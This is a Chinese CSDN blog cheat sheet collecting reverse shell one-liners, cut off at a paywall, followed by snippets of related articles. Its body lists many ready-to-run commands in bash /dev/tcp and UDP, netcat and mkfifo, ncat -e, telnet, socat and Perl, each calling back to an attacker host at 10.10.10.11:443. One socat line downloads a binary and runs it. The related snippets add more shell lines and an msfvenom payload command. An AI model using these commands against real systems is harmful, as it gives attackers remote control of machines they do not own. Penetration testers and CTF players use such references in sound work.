反弹shell汇总

最新推荐文章于 2024-09-10 20:38:52 发布
最新推荐文章于 2024-09-10 20:38:52 发布
阅读量789 收藏 4
点赞数
文章标签: bash linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chang113/article/details/125247229
版权
本文详细介绍了在各种环境下,包括Linux和Windows平台,如何利用Bash、Netcat、Perl、Python、Ruby、PHP、Powershell等工具或脚本进行反弹shell操作。内容涵盖TCP、UDP等多种协议,以及Java、Lua、NodeJS、Groovy等不同编程语言实现的反弹shell方法。同时,还涉及了免杀PowerShell反弹Shell和解决乱码问题的策略。
摘要由CSDN通过智能技术生成

假设本机地址10.10.10.11,监听端口443。

Linux反弹shell解决乱码

ctrl+z 放置后台任务 设置原始格式

stty -echo raw

bg     //显示出来

fg    //调出前台使用

1、Bash环境下反弹TCP协议shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

bash -i >& /dev/tcp/10.10.10.11/443 0>&1
/bin/bash -i > /dev/tcp/10.10.10.11/443 0<& 2>&1
exec /bin/sh 0</dev/tcp/10.10.10.11/443 1>&0 2>&0
exec /bin/sh 0</dev/tcp/10.10.10.11/443 1>&0 2>&0
exec 5<>/dev/tcp/10.10.10.11/443;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/10.10.10.11/443 1>&0 2>&0
nc -u -lvp 443
0<&196;exec 196<>/dev/tcp/10.10.10.11/443; sh <&196 >&196 2>&196

2、Bash环境下反弹UDP协议shell:

首先在本地监听UDP协议443端口

nc -u -lvp 443

然后在靶机上执行如下命令:

sh -i >& /dev/udp/10.10.10.11/443 0>&1

3、使用Netcat反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.10.10.11 443 > f
rm -f x; mknod x p && nc 10.10.10.11 443 0<x | /bin/bash 1>x

4、使用Ncat反弹shell

ncat 10.10.10.11 443 -e /bin/bash

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

ncat --udp 10.10.10.11 443 -e /bin/bash

5、利用Telnet反弹shell

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.10.11 443 0/tmp/p 2>&1

telnet 10.10.10.11 443 | /bin/bash | telnet 10.10.10.11 444

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 10.10.10.11 443 > f

rm -f x; mknod x p && telnet 10.10.10.11 443 0<x | /bin/bash 1>x

6、使用Socat反弹shell

首先在本地监听TCP协议443端口

socat file:`tty`,raw,echo=0 TCP-L:443

然后在靶机上执行如下命令:

socat tcp-connect:10.10.10.11:443 exec:"bash -li",pty,stderr,setsid,sigint,sane
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.11:443

7、利用Perl脚本反弹

首先在本地监听TCP协议443端口

nc -lvp 443

然后在靶机上执行如下命令:

perl -e 'use Socket;$i="10.10.10.11";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.11:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

win平台下执行:

perl -MIO -e '$c=new IO::Socket
最低0.47元/天 解锁文章
chang113
关注
反弹shell总结
weixin_54626591的博客
08-31 1710
反弹shell总结
redis攻防知识汇总
admin的博客
05-13 182
Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有进行有效保护措施,那么处于公网的redis服务就会被任意的用户未授权访问,读取数据,甚至利用redis自身的命令,进行写入文件操作,这样就会恶意攻击者利用redis未授权漏洞进行进一步攻击。
JSP脚本反弹程序
10-20
实现shell反弹到指定地址,进行交互式SHELL管理!
利用js文件反弹shell
热门推荐
chaojixiaojingang
03-17 1万+
1.环境 攻击机:Kali 192.168.42.138 靶机:Win7 192.168.42.139 2.安装工具ps1encode 下载地址:https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.git 3. 利用js文件反弹shell 先利用ps1encode生成js payload ./ps1encode.rb --LHOS
内网安全:反弹shell
最新发布
8888的博客
09-10 1527
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
[Shell]利用JS文件反弹Shell
baguangman5501的博客
09-17 442
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.g...
js获取ip_AWS Lambda Node.js 反弹shell
weixin_39641231的博客
11-12 126
PS:文章一般都会先首发于我的个人Blog上:AWS Lambda Node.js 反弹shell ,有需要的小伙伴可以直接订阅我的Blog,获取最新内容。0x00 前言原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。0x01 被攻击端直接套到lambda函数里就行了(function(){ var net = require("net"), cp...
cmd反弹shell
08-19
- *2* *3* [反弹shell汇总(超详细)](https://blog.csdn.net/qq_52173020/article/details/125011441)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
Ghost in the Log4Shell
IDEAL Garden
01-07 235
核弹级漏洞 Log4Shell(CVE-2021-44228)的影响必将是深远的,不仅仅是当下肉眼可见的攻击事件和损失数据,在相当长时间的将来我们都会被这次的阴影所笼罩 – 蠕虫病毒和勒索软件的肆虐,个人敏感数据的大量泄漏。
反弹shell
YouthBelief的博客
12-05 1278
搭建http服务 python2 搭建http服务 python -m SimpleHTTPServer 8080 python3 搭建http服务 python -m http.server 8080 反弹shell nc -e /bin/bash -d 192.168.157.137 8080 php -r ‘$sock=fsockopen(“192.168.157.137”,8080);exec("/bin/sh -i <&3 >&3 2>&3");’ 解决s
JS探测内网是否存在bash漏洞,反弹shell
Jiajia2017的博客
11-26 222
来t00ls几天啦,也没时间写原创。  --(本人首发土司啦。)最近看到老外一篇文章,觉得很不错。测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西。搞APT应该用得到啦。测试过程:老外发的一个Poc我内网搭建测试先监听了本地250端口然后搭建之后访问 1 h...
反弹shell的命令大全
G3et的博客
03-21 937
【代码】反弹shell的命令大全。
基于JavaScript的rce反弹shell漏洞
qq_41679358的博客
08-17 3371
本文转自行云博客https://www.xy586.top/ 文章目录环境要求工具地址攻击步骤 环境要求 kali攻击机 192.168.232.131 win10靶机 192.168.232.140 工具地址 https://github.com/CroweCybersecurity/ps1encode 攻击步骤 拉取工具到kali的根目录下 git clone https://github.com/CroweCybersecurity/ps1encode.git 给权限 chmod +x pslen.
反弹shell命令
Shanfenglan's blog
10-29 2693
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
MSF 生成shell命令
baidu_126894的博客
10-20 1727
MSF 生成在 Linux反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C Shellcode)...
shell学习之--shell简介
u011960700的博客
08-03 124
Shell 教程 Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。 Ken Thompson 的 sh 是第一种 Unix Shell,Windows Explorer 是一个典型的图形界面 Shell。 She...
MyJSRat结合CHM来反弹shell
大方子
09-02 720
项目地址:https://github.com/Ridter/MyJSRat python MyJSRat.py -i 192.168.61.130 -p 8080 -i:为攻击机的IP地址 -p:为监听的端口 然后访问http://192.168.61.130:8080/wtf得到攻击载荷 然后新建一个test.html把攻击载荷复制到里面 ...
反弹Shell大全与原理
weixin_55652418的博客
01-02 1385
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
深度解析:Linux反弹shell的分类与本质
"不一样的视角剖析Linux 反弹shell水印版.pdf" 本文深入探讨了Linux环境下的反弹shell,从一个新的视角进行分类和解析,旨在揭示更多技术细节。作者指出,传统的反弹shell分类通常只分为交互式和非交互式,但这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值